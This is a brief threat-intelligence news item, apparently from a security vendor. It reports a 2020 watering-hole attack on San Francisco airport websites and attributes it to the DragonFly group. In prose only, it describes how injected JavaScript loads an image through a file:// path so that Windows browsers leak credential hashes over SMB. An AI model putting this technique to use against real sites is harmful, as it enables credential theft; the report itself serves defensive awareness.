DragonFly Linked to San Francisco Airport Attacks

Delaware, USA – April 17, 2020 – The websites of the San Francisco International Airport used by airport employees and construction contractors became the targets of a cyber attack in March 2020. The airport management reported the incident on the official website: “The attackers inserted malicious computer code on these websites to steal some users’ login credentials. Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.” ESET researchers said that the main suspect in these attacks is the Russian state-sponsored group DragonFly also known as Energetic Bear. After the compromise, adversaries added malicious JavaScript injecting a single-pixel image into the websites. The group uses the “file://” command to load the image forcing the Windows browser to send the user’s account name and hashed password via SMB protocol. DragonFly APT could use stolen data to infiltrate the San Francisco International Airport network and install malware or steal valuable information.

DragonFly APT has been active since at least 2010, its primary targets are energy, aviation, and industrial companies in the USA and Europe. The group has repeatedly carried out watering hole attacks using just this method of obtaining the credentials needed to penetrate the network. It is not known whether the attackers managed to penetrate the airport network and whether San Francisco International Airport was their only target. You can learn more about the group’s techniques and tools using mobile-friendly MITRE ATT&CK map: https://attack.socprime.com/#!/